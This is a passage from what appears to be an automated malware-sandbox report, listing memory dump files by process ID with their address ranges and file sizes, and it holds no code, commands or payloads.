4KB
-
memory/912-235-0x0000000004A20000-0x0000000004A21000-memory.dmpFilesize
4KB
-
memory/1108-328-0x0000000000770000-0x00000000007BC000-memory.dmpFilesize
304KB
-
memory/1108-161-0x0000000000000000-mapping.dmp
-
memory/1108-329-0x0000000000400000-0x000000000058E000-memory.dmpFilesize
1.6MB
-
memory/1112-165-0x0000000000000000-mapping.dmp
-
memory/1224-168-0x0000000000000000-mapping.dmp
-
memory/1292-327-0x0000000000000000-mapping.dmp
-
memory/1440-358-0x0000000000000000-mapping.dmp
-
memory/1512-172-0x0000000000000000-mapping.dmp
-
memory/1520-350-0x0000000000000000-mapping.dmp
-
memory/1520-362-0x0000000001530000-0x0000000001532000-memory.dmpFilesize
8KB
-
memory/1524-310-0x0000000000000000-mapping.dmp
-
memory/1560-174-0x0000000000000000-mapping.dmp
-
memory/1596-176-0x0000000000000000-mapping.dmp
-
memory/1668-348-0x0000000000C40000-0x0000000000C50000-memory.dmpFilesize
64KB
-
memory/1668-351-0x0000000000E40000-0x0000000000E52000-memory.dmpFilesize
72KB
-
memory/1668-339-0x0000000000000000-mapping.dmp
-
memory/1696-285-0x00000000053A0000-0x00000000053A1000-memory.dmpFilesize
4KB
-
memory/1696-286-0x00000000054D0000-0x00000000054D1000-memory.dmpFilesize
4KB
-
memory/1696-278-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/1696-279-0x0000000000418542-mapping.dmp
-
memory/1696-294-0x0000000005440000-0x0000000005441000-memory.dmpFilesize
4KB
-
memory/1696-292-0x0000000005400000-0x0000000005401000-memory.dmpFilesize
4KB
-
memory/1696-284-0x0000000005920000-0x0000000005921000-memory.dmpFilesize
4KB
-
memory/1696-298-0x0000000005310000-0x0000000005916000-memory.dmpFilesize
6.0MB
-
memory/1808-259-0x0000000000000000-mapping.dmp
-
memory/1820-178-0x0000000000000000-mapping.dmp
-
memory/1948-180-0x0000000000000000-mapping.dmp
-
memory/1968-275-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/1968-263-0x0000000000000000-mapping.dmp
-
memory/2072-182-0x0000000000000000-mapping.dmp
-
memory/2148-841-0x0000000000C80000-0x0000000000C81000-memory.dmpFilesize
4KB
-
memory/2156-366-0x0000000000000000-mapping.dmp
-
memory/2364-324-0x00000000031A0000-0x00000000031EA000-memory.dmpFilesize
296KB
-
memory/2364-334-0x0000000000400000-0x0000000002F1B000-memory.dmpFilesize
43.1MB
-
memory/2364-184-0x0000000000000000-mapping.dmp
-
memory/2364-322-0x0000000002F20000-0x000000000306A000-memory.dmpFilesize
1.3MB
-
memory/2392-251-0x000000001B400000-0x000000001B402000-memory.dmpFilesize
8KB
-
memory/2392-364-0x0000000000000000-mapping.dmp
-
memory/2392-186-0x0000000000000000-mapping.dmp
-
memory/2392-218-0x0000000000640000-0x0000000000641000-memory.dmpFilesize
4KB
-
memory/2400-194-0x0000000000000000-mapping.dmp
-
memory/2400-231-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2424-233-0x0000000004930000-0x0000000004931000-memory.dmpFilesize
4KB
-
memory/2424-198-0x0000000000000000-mapping.dmp
-
memory/2424-222-0x0000000000050000-0x0000000000051000-memory.dmpFilesize
4KB
-
memory/2424-250-0x0000000004B80000-0x0000000004B81000-memory.dmpFilesize
4KB
-
memory/2440-199-0x0000000000000000-mapping.dmp
-
memory/2492-147-0x0000000000000000-mapping.dmp
-
memory/2592-357-0x0000000000000000-mapping.dmp
-
memory/2660-215-0x0000000000310000-0x0000000000311000-memory.dmpFilesize
4KB
-
memory/2660-211-0x0000000000310000-0x0000000000311000-memory.dmpFilesize
4KB
-
memory/2660-196-0x0000000000000000-mapping.dmp
-
memory/2664-195-0x0000000000000000-mapping.dmp
-
memory/2680-189-0x0000000000000000-mapping.dmp
-
memory/2688-354-0x0000000000000000-mapping.dmp
-
memory/2688-363-0x000000001AD60000-0x000000001AD62000-memory.dmpFilesize
8KB
-
memory/2696-247-0x0000000002A20000-0x0000000002A21000-memory.dmpFilesize
4KB
-
memory/2696-192-0x0000000000000000-mapping.dmp
-
memory/2696-254-0x00000000056C0000-0x00000000056C1000-memory.dmpFilesize
4KB
-
memory/2696-248-0x00000000051B0000-0x00000000051B1000-memory.dmpFilesize
4KB
-
memory/2696-223-0x0000000000740000-0x0000000000741000-memory.dmpFilesize
4KB
-
memory/2716-554-0x0000000002F40000-0x000000000308A000-memory.dmpFilesize
1.3MB
-
memory/2716-600-0x0000000000400000-0x0000000002F40000-memory.dmpFilesize
43.2MB
-
memory/2716-558-0x0000000004BD0000-0x0000000004C5E000-memory.dmpFilesize
568KB
-
memory/2720-190-0x0000000000000000-mapping.dmp
-
memory/2728-269-0x0000000000000000-mapping.dmp
-
memory/2760-261-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2760-255-0x0000000000000000-mapping.dmp
-
memory/2780-150-0x0000000000000000-mapping.dmp
-
memory/2932-197-0x0000000000000000-mapping.dmp
-
memory/2932-331-0x0000000002F20000-0x0000000002F29000-memory.dmpFilesize
36KB
-
memory/2932-347-0x0000000000400000-0x0000000002EFA000-memory.dmpFilesize
43.0MB
-
memory/2932-325-0x0000000002F10000-0x0000000002F18000-memory.dmpFilesize
32KB
-
memory/3060-407-0x0000000000910000-0x0000000000926000-memory.dmpFilesize
88KB
-
memory/3068-453-0x000000001C460000-0x000000001C462000-memory.dmpFilesize
8KB
-
memory/3068-217-0x00000000005E0000-0x00000000005E1000-memory.dmpFilesize
4KB
-
memory/3068-187-0x0000000000000000-mapping.dmp
-
memory/3108-361-0x0000000000000000-mapping.dmp
-
memory/3108-529-0x0000000000590000-0x00000000006DA000-memory.dmpFilesize
1.3MB
-
memory/3108-532-0x0000000000400000-0x000000000058A000-memory.dmpFilesize
1.5MB
-
memory/3136-170-0x0000000000000000-mapping.dmp
-
memory/3504-216-0x0000000000E40000-0x0000000000E41000-memory.dmpFilesize
4KB
-
memory/3504-232-0x0000000002F10000-0x0000000002F11000-memory.dmpFilesize
4KB
-
memory/3504-188-0x0000000000000000-mapping.dmp
-
memory/3504-246-0x000000001B980000-0x000000001B982000-memory.dmpFilesize
8KB
-
memory/3652-484-0x0000000000400000-0x00000000005E0000-memory.dmpFilesize
1.9MB
-
memory/3652-481-0x00000000006F0000-0x000000000083A000-memory.dmpFilesize
1.3MB
-
memory/3652-345-0x0000000000000000-mapping.dmp
-
memory/3676-148-0x0000000000000000-mapping.dmp
-
memory/3720-312-0x0000000000000000-mapping.dmp
-
memory/3744-193-0x0000000000000000-mapping.dmp
-
memory/3844-287-0x0000000000000000-mapping.dmp
-
memory/3844-300-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/3844-302-0x00000000001F0000-0x00000000001F1000-memory.dmpFilesize
4KB
-
memory/3844-304-0x0000000000C50000-0x0000000000C51000-memory.dmpFilesize
4KB
-
memory/3844-306-0x0000000000C60000-0x0000000000C61000-memory.dmpFilesize
4KB
-
memory/3856-191-0x0000000000000000-mapping.dmp
-
memory/3936-290-0x0000000000000000-mapping.dmp
-
memory/4024-115-0x0000000000000000-mapping.dmp
-
memory/4128-152-0x0000000000000000-mapping.dmp
-
memory/4276-118-0x0000000000000000-mapping.dmp
-
memory/4276-139-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4276-145-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4276-141-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/4276-140-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/4276-142-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4276-143-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/4276-137-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/4276-138-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/4276-136-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/4276-144-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4276-135-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/4276-134-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/4348-340-0x0000000000000000-mapping.dmp
-
memory/4352-335-0x0000000000000000-mapping.dmp
-
memory/4464-326-0x0000000000000000-mapping.dmp
-
memory/4516-349-0x000000001B120000-0x000000001B122000-memory.dmpFilesize
8KB
-
memory/4516-336-0x0000000000000000-mapping.dmp
-
memory/4560-146-0x0000000000000000-mapping.dmp
-
memory/4764-303-0x0000000000418D2E-mapping.dmp
-
memory/4764-301-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4764-333-0x0000000004EF0000-0x00000000054F6000-memory.dmpFilesize
6.0MB
-
memory/4796-477-0x0000000008890000-0x0000000008E96000-memory.dmpFilesize
6.0MB
-
memory/5372-644-0x0000000000BE0000-0x0000000000BE1000-memory.dmpFilesize
4KB
-
memory/5480-562-0x00000000025F0000-0x00000000025F1000-memory.dmpFilesize
4KB
-
memory/5532-688-0x00000000055D3000-0x00000000055D4000-memory.dmpFilesize
4KB
-
memory/5532-691-0x00000000055D0000-0x00000000055D1000-memory.dmpFilesize
4KB
-
memory/5532-716-0x00000000055D4000-0x00000000055D6000-memory.dmpFilesize
8KB
-
memory/5532-677-0x00000000001C0000-0x00000000001EF000-memory.dmpFilesize
188KB
-
memory/5532-680-0x0000000000400000-0x0000000001024000-memory.dmpFilesize
12.1MB
-
memory/5532-685-0x00000000055D2000-0x00000000055D3000-memory.dmpFilesize
4KB
-
memory/5588-608-0x0000000004B00000-0x0000000004B01000-memory.dmpFilesize
4KB
-
memory/5608-596-0x0000000004E30000-0x0000000004E31000-memory.dmpFilesize
4KB
-
memory/5676-604-0x00000000023A0000-0x00000000023A1000-memory.dmpFilesize
4KB
-
memory/5732-664-0x0000000004C00000-0x0000000004CAC000-memory.dmpFilesize
688KB
-
memory/5732-661-0x0000000004AA0000-0x0000000004B4D000-memory.dmpFilesize
692KB
-
memory/5920-627-0x0000000005190000-0x0000000005191000-memory.dmpFilesize
4KB
-
memory/5944-695-0x00000000091B0000-0x00000000097B6000-memory.dmpFilesize
6.0MB
-
memory/6048-809-0x0000022E2D050000-0x0000022E2D270000-memory.dmpFilesize
2.1MB
-
memory/6048-845-0x0000022E479C3000-0x0000022E479C5000-memory.dmpFilesize
8KB
-
memory/6048-851-0x0000022E479C6000-0x0000022E479C7000-memory.dmpFilesize
4KB